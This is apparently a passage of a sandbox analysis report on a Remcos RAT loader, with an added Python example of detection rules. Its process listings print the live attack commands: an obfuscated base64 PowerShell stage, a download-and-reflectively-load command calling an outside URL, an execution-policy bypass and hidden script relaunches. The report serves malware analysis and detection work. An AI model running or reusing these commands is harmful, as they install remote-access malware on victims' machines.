                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true
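Targets 0 to 18 above are a ping-pong between wscript.exe, powershell.exe and an argument-less RegSvcs.exe: the script host starts the stage-1 decoder, stage 2 loads the downloaded assembly reflectively, drops xx1.ps1 and xx2.vbs, copies the .vbs to %TEMP%, and starts RegSvcs.exe with no arguments as the Remcos host; Targets 13 to 18 then relaunch the %TEMP% copy hidden through `wscript //b //nologo`, after which Targets 19 onward repeat the chain from there. The Python below is an added example, not part of the report: it runs a handful of process-creation rules over events constructed from the command lines listed above (the stage-1 blob shortened to '...', Target 3 shortened after Invoke). The parent links in the sample are an assumption reconstructed from start order and command-line contents, since the report lists no parent PIDs; the rule names are mine.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
RS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"


@dataclass
class ProcEvent:
    pid: int             # the report's Target ID stands in for the process id
    ppid: Optional[int]  # ASSUMED parent, reconstructed from start order; the report lists none
    image: str
    cmdline: str


# Constructed from the report's process list (command lines shortened where noted).
EVENTS = [
    ProcEvent(0, None, WS, r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"'),
    ProcEvent(1, 0, PS, "powershell.exe $ExeNy = 'J Bi Gk ...';$KByHL = [system.Text.Encoding]::Unicode.GetString("
                        " [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );powershell $KByHL;"),
    ProcEvent(3, 1, PS, "powershell.exe \"[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
                        ".DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));"
                        "[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke(...)\""),
    ProcEvent(4, 3, PS, r"powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1"),
    ProcEvent(8, 3, RS, f'"{RS}"'),
    ProcEvent(9, 4, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1'),
    ProcEvent(13, 9, PS, "PowerShell.exe -WindowStyle hidden \"& 'C:\\Users\\user\\AppData\\Local\\Temp\\xx2.vbs' \""),
    ProcEvent(15, 13, WS, r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"'),
    ProcEvent(16, 15, PS, r"powershell.exe -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'"),
    ProcEvent(18, 16, WS, r'"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs'),
]


def base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


Rule = Callable[[ProcEvent, Optional[ProcEvent]], bool]

RULES: Dict[str, Rule] = {
    # The wscript <-> powershell ping-pong that drives the whole chain.
    "script_host_spawns_powershell": lambda e, p:
        p is not None and base(p.image) in ("wscript.exe", "cscript.exe") and base(e.image) == "powershell.exe",
    "powershell_spawns_script_host": lambda e, p:
        p is not None and base(p.image) == "powershell.exe" and base(e.image) in ("wscript.exe", "cscript.exe"),
    "powershell_runs_vbs": lambda e, p:
        base(e.image) == "powershell.exe" and ".vbs" in e.cmdline.lower(),
    # Stage 1: base64 of UTF-16 text, with the 'A'-to-space substitution undone inline.
    "encoded_command_decoder": lambda e, p:
        "FromBase64String" in e.cmdline and ("Unicode.GetString" in e.cmdline or ".replace(' ','A')" in e.cmdline),
    # Stage 2: download, AppDomain.Load, reflection; the assembly never touches disk.
    "reflective_assembly_load": lambda e, p:
        "DownloadString(" in e.cmdline and "CurrentDomain.Load(" in e.cmdline,
    "execution_policy_bypass": lambda e, p:
        re.search(r"Set-ExecutionPolicy\s+Bypass", e.cmdline, re.I) is not None,
    # .NET utility started by PowerShell with no arguments: an injection host, not a real RegSvcs run.
    "dotnet_utility_no_args_from_powershell": lambda e, p:
        base(e.image) in ("regsvcs.exe", "regasm.exe", "installutil.exe")
        and e.cmdline.strip().strip('"') == e.image
        and p is not None and base(p.image) == "powershell.exe",
    # Hidden relaunch of the %TEMP% copy through wscript //b, which suppresses script dialogs.
    "hidden_wscript_relaunch": lambda e, p:
        re.search(r"-WindowStyle\s+hidden", e.cmdline, re.I) is not None
        and re.search(r"wscript(\.exe)?\s+//b", e.cmdline, re.I) is not None,
}


def evaluate(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: [rule names that fired]} for every event that tripped at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[str]] = {}
    for e in events:
        parent = by_pid.get(e.ppid) if e.ppid is not None else None
        fired = [name for name, rule in RULES.items() if rule(e, parent)]
        if fired:
            hits[e.pid] = fired
    return hits


def chain_verdict(hits: Dict[int, List[str]], threshold: int = 4) -> bool:
    """Single rules fire on the odd admin script; alert on the number of distinct stages seen together."""
    distinct = {name for fired in hits.values() for name in fired}
    return len(distinct) >= threshold


if __name__ == "__main__":
    result = evaluate(EVENTS)
    for pid in sorted(result):
        print(pid, result[pid])
    print("loader chain:", chain_verdict(result))
```

Each rule on its own is noisy in a real estate (Set-ExecutionPolicy Bypass and PowerShell-launched scripts are everyday admin activity); the verdict function counts distinct stages across the tree, which is where this sample separates from benign scripting: eight different rules fire across nine processes of one chain.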

                                  Target ID:19
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:20
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:21
                                  Start time:04:55:26
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Has exited:true

                                  Target ID:22
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x140000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x510000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:28
                                  Start time:04:55:31
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:04:55:31
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:04:55:32
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:04:55:32
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:35
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:36
                                  Start time:04:55:34
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Has exited:true

                                  Target ID:37
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:04:55:37
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:41
                                  Start time:04:55:38
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x30000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:16.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:12
                                    Total number of Limit Nodes:0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e83fd9914ae3a9e22e2362c80290ef68a6538bd813b7d2cfab3f78eca558c80
                                    • Instruction ID: afa0659339431e617c1cd0c363710ba9b5fcf253c5def77002ed9867be16fe10
                                    • Opcode Fuzzy Hash: 1e83fd9914ae3a9e22e2362c80290ef68a6538bd813b7d2cfab3f78eca558c80
                                    • Instruction Fuzzy Hash: F7D26722B1EBC91FEB66976858B55B47BE1EF86614B0901FBD08DC71E3DD08AD06C381

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: dcdcba03f55aa2ef22f93fa55de90b83c27dda0ab71241ac15917546a79786bc
                                    • Instruction ID: 0a9abb89ac25f106cbe3e75e3ef1d51f0b1b2e4133a04086d1ee9a14af12f050
                                    • Opcode Fuzzy Hash: dcdcba03f55aa2ef22f93fa55de90b83c27dda0ab71241ac15917546a79786bc
                                    • Instruction Fuzzy Hash: DFF19F7090DA9D8FDB99DF58C864BE9BBF0EF5A310F0500EEC049E72A2DA345985CB41

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 41a8743586ec5f1b12f05326243ad35047fc645551a1f8d3cbc2b1ab9a95de54
                                    • Instruction ID: 6547089ea2dae2be972353736363c36b43c7e832f06443296a5d9eca2dfcda82
                                    • Opcode Fuzzy Hash: 41a8743586ec5f1b12f05326243ad35047fc645551a1f8d3cbc2b1ab9a95de54
                                    • Instruction Fuzzy Hash: C2611274908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB40

                                    Control-flow Graph

                                    APIs
